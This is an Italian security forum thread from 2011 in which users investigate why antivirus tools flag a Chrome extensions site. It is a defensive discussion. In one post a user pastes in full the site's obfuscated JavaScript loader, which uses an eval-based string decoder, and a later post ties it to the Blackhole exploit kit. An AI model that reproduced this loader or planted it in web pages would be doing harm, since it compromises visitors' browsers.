Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Avast blocca pagina chrome exstension come trojan horse

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

Avast blocca pagina chrome exstension come trojan horse

Messaggioda sondlive07 » mer giu 15, 2011 10:42 am

ieri ho notato che il mio avast 6 free mi blocca la pagina http://www.chromeextensions.org come infetta ( trojan horse )
qualcuno di voi ha notato la stessa cosa ?
ma è un falso o ci si deve preoccupare ?
[grazie]
Se fossi uno scultore ti scolpirei... Se fossi un cantautore ti canterei... Se fossi un pittore ti dipingerei... Ma sono solo un trombettista! [:)]
Avatar utente
sondlive07
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2446
Iscritto il: mar feb 02, 2010 8:52 pm
Località: casa mia

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda developerwinme » mer giu 15, 2011 10:56 am

sondlive07 ha scritto:ieri ho notato che il mio avast 6 free mi blocca la pagina http://www.chromeextensions.org come infetta ( trojan horse )

Ti posso confermare che anche il mio Avast, oggi, blocca la pagina.

Inoltre anche Opera (tramite la protezione integrata di AVG) blocca il sito, quindi non credo che si tratti di un falso positivo.
PC: ASUS X53S (Intel Core i7-2670QM 2.20 Ghz, RAM 8 GB, NVIDIA GeForce GT520MX, Windows 8 Pro)
Mobile: Nokia Lumia 710 (CPU 1,4 Ghz, RAM 512 MB, Windows Phone 7.8)
--
developerwinme.wordpress.com
Avatar utente
developerwinme
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 5014
Iscritto il: mar dic 30, 2008 7:00 pm
Località: Como

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda Nichi » mer giu 15, 2011 11:07 am

Controlla il sito qui http://safeweb.norton.com/

Io l'ho fatto è norton safe web lo reputa sicuro.
Siamo solo pedine... [B)]
Avatar utente
Nichi
Senior Member
Senior Member
 
Messaggi: 388
Iscritto il: ven feb 26, 2010 3:16 pm


Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda Nichi » mer giu 15, 2011 11:26 am

ecco la diagnostica di google http://google.com/safebrowsing/diagnost ... sions.org/

puoi controllare anche qui http://www.unmaskparasites.com/ inserendo nell'aposito spazio l'indirizzo del sito da controllare senza http//, quindi inserendo solo www.chromeextensions.org

Il sito sembrerebbe pulito.
Siamo solo pedine... [B)]
Avatar utente
Nichi
Senior Member
Senior Member
 
Messaggi: 388
Iscritto il: ven feb 26, 2010 3:16 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda farbix89 » mer giu 15, 2011 12:08 pm

Il problema del sito sono le estensioni non ufficiose che permette di installare : sono meno controllate rispetto al sito ufficiale,quindi prima o poi rischi di incappare in estensioni maligne (cosa che potrebbe già essere avvenuta,se i reputation rating lo segnalano come maligno).

Voci maligne in realtà dicono che Google si sia mossa verso siti simili perché distribuiscono estensioni fin troppo utili per gli utenti: vedi sul sito ufficiale se trovi una sola estensione per scaricare video da Youtube [sh]
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda farbix89 » mer giu 15, 2011 12:14 pm

Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda ssjx » mer giu 15, 2011 12:46 pm

magari è un problema recente e quindi su WOT è presente ancora la vecchia classificazione... mi sembrerebbe strano che due servizi indipendenti lo classificano come trojan senza motivo (per altro è la prima volta che vedo la protezione di Opera in azione [:D] )
Usavo IE e mi lamentavo... usavo Mozilla e mi lamentavo, decisamente meno ma mi lamentavo, ... poi ho trovato Opera e fu amore a prima vista
Avatar utente
ssjx
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 5756
Iscritto il: ven nov 26, 2004 3:37 pm
Località: Barcellona

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda sondlive07 » mer giu 15, 2011 1:59 pm

anche il controllo su virustotal ritiene sicuro il sito

Voci maligne in realtà dicono che Google si sia mossa verso siti simili perché distribuiscono estensioni fin troppo utili per gli utenti: vedi sul sito ufficiale se trovi una sola estensione per scaricare video da Youtube [sh]


questa è stata una delle prime cose che ho pensato ...................................
Se fossi uno scultore ti scolpirei... Se fossi un cantautore ti canterei... Se fossi un pittore ti dipingerei... Ma sono solo un trombettista! [:)]
Avatar utente
sondlive07
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2446
Iscritto il: mar feb 02, 2010 8:52 pm
Località: casa mia

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda crazy.cat » mer giu 15, 2011 3:46 pm

Il presunto file infetto è questo
Codice: Seleziona tutto
http://www.chromeextensions.org/wp-content/themes/chrome-extensions/js/info.js


Secondo virurtotal http://www.virustotal.com/file-scan/rep ... 1308148698
Quando i molti governano, pensano solo a contentar sé stessi, si ha allora la tirannia più balorda e più odiosa: la tirannia mascherata da libertà.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda ssjx » mer giu 15, 2011 4:08 pm

Codice: Seleziona tutto
el=document.createElement("input");el.setAttribute("value","&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114;&#114;");try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.value+a.toString().substr(0,0);};var ar="me10sty>:n<)w2cv /l.zpbgi=;\"fhau(odr";var ar2="R136,-4,-76,68,-124,4,32,-16,56,-28,92,-44,-76,-16,124,-20,-68,56,16,28,-20,-120,4,60,-48,124,-84,44,16,-96,0,64,-52,36,0,16,36,20,-20,-64,84,-116,60,-64,56,12,8,-16,-12,-48,96,-112,-4,4,12,52,-52,-12,56,-56,32,32,28,-96,120,-28,-88,12,52,-52,4,4,48,-68,48,16,24,-16,8,32,-32,-20,-16,48,40,-116,96,-16,-92,56,52,-112,92,-4,24,-96,80,-88,52,48,28,-20,-120,4,84,44,8,-4,-132,136,-40,-88,52,-48,40,84,-8,-60,0,24,-60,56,8,-64,96,-68,-28,96,8,-136,12,80,-16,-76,24,12,28,28,16,28,-20,-120,4,24,80,-64,60]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);

Mi piacerebbe capire che accidenti farebbe un codice del genere [uhm]
Usavo IE e mi lamentavo... usavo Mozilla e mi lamentavo, decisamente meno ma mi lamentavo, ... poi ho trovato Opera e fu amore a prima vista
Avatar utente
ssjx
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 5756
Iscritto il: ven nov 26, 2004 3:37 pm
Località: Barcellona

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda sondlive07 » mer giu 15, 2011 4:13 pm

Se fossi uno scultore ti scolpirei... Se fossi un cantautore ti canterei... Se fossi un pittore ti dipingerei... Ma sono solo un trombettista! [:)]
Avatar utente
sondlive07
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2446
Iscritto il: mar feb 02, 2010 8:52 pm
Località: casa mia

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda farbix89 » mer giu 15, 2011 4:14 pm

Opera lo identifica come sito di Phishing [uhm]
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda Nichi » mer giu 15, 2011 9:03 pm

Vi linko questo sito moooolto interessante:
http://sitecheck.sucuri.net/scanner/
è un servizio on line che permette di effettuare la scansione di un sito alla ricerca di malware e phishing, fornisce moltissime informazioni, anche l'indirizzo ip che potrà servire per un'ulteriore verifica attraverso quest'altro sito:
http://www.ipvoid.com/
che ci farà sapere se tale indirizzo ip è sicuro attraverso diversi servizi online.

Da provare... [^]
Siamo solo pedine... [B)]
Avatar utente
Nichi
Senior Member
Senior Member
 
Messaggi: 388
Iscritto il: ven feb 26, 2010 3:16 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda hashcat » gio giu 16, 2011 9:44 am

Ecco il js reso più comprensibile:

http://pastebin.com/3XCrssBq
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda hashcat » gio giu 16, 2011 2:05 pm

Risolto il dilemma (almeno parzialmente).

Il file in questione sembra essere collegato con il kit di Exploit Blackhole che trai tanti siti bersaglio colpisce le versioni non aggiornate di Wordpress.

La versione di Wordpress del server è la 2.9.1 mentre la pù recente è la 3.1.3.

Per farsene un idea basta cercare su google porzioni dello script (ad esempio):

Codice: Seleziona tutto
e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');


Noterete che i risultati che ne vengono fuori sono tutti relativi a siti compromessi (da molti exploit), è possibile che l'infezione del sito sia avvenuta casualmente è che l'amministratore non se ne sia accorto.

Nel frattempo ho inviato il file in questione ad Avira che lo ha classificato come MALWARE e dal prossimo aggiornamento verrà riconosciuto come:

JS/Borak.se

http://analysis.avira.com/samples/details.php?uniqueid=CxCGZbGDjGHM5DvWW9Cny65CxbBNtMzU&incidentid=762681

Quindi da ora in poi prestate attenzione se decidete di navigare su questo sito [fischio]

P.S.: Ecco il report di google safebrowsing di uno di questi siti compromessi (va tutto bene):

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Findometastan.in%2Fin.cgi%3Fdefault&client=googlechrome&hl=it
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda hashcat » gio giu 16, 2011 3:55 pm

Se a qualcuno interessasse ecco il codice sorgente della home page:

http://pastebin.com/KALWSwX7

[sh]
<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda hashcat » ven giu 17, 2011 11:45 am

<<Intelligence is the ability to avoid doing work, yet getting the work done.>>
Linus Torvalds

EX [MLI] Power User.
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda Nichi » ven giu 17, 2011 9:48 pm

yyy avast
yyy opera (AVG)
Siamo solo pedine... [B)]
Avatar utente
Nichi
Senior Member
Senior Member
 
Messaggi: 388
Iscritto il: ven feb 26, 2010 3:16 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda FrankSix » dom giu 19, 2011 2:19 pm

Mi sono un po' perso nella lettura [:D] Alla fin fine il sito è considerabile come malware quindi? [8)]
"Più sento parlare gli uomini e più apprezzo il silenzio degli animali"
Avatar utente
FrankSix
Bronze Member
Bronze Member
 
Messaggi: 592
Iscritto il: ven ago 27, 2010 6:22 pm

Re: Avast blocca pagina chrome exstension come trojan horse

Messaggioda farbix89 » dom giu 19, 2011 2:29 pm

FrankSix ha scritto:Mi sono un po' perso nella lettura [:D] Alla fin fine il sito è considerabile come malware quindi? [8)]



Il sito in questione è stato compromesso da un exploit.....quindi navigarci ora è molto pericoloso.
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Prossimo

Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 16 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising